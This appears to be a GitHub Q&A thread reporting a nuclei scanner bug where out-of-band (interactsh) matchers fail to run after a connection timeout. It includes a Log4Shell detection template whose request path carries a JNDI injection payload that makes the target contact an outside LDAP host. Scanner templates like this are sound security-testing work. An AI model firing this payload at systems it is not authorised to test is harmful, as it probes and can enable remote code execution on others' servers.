### DISCUSSION TITLE
Matchers (ie: OOB) could still run for connection timeout

### DISCUSSION THREAD

**Discussion by fopinappb** [projectdiscovery/nuclei#1447] [Q&A] [answered]
### Nuclei version:
[INF] Current Version: 2.5.4

### Current Behavior:

Ran a test that triggers a connection timeout. The defined matcher is for interactsh `dns` and the request is received (shown with `-debug`) but nuclei does not run the matchers because the connection timed out.

### Expected Behavior:

Given the OOB matching, I'd expect to be able for matchers to be evaluated even on connection timeout, even if it's a flag in the template.

### Steps To Reproduce:

1. run `nuclei -u http://target -t custom/log4j.yml -debug -retries 1`

### Anything else:

log4j:
```yaml
id: CVE-99999-99999

info:
  name: .
  author: .
  description: .
  tags: cve

requests:
  - method: GET
    path:
      - '{{BaseURL}}/${jndi:ldap://{{interactsh-url}}:443/a}'

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
```

(related to the new log4j PoC - https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html)

With `-debug` I can see
```
[c6x] Received DNS interaction (A) from 1.2.3.4 at 2021-12-10 15:51:43
```
but no match
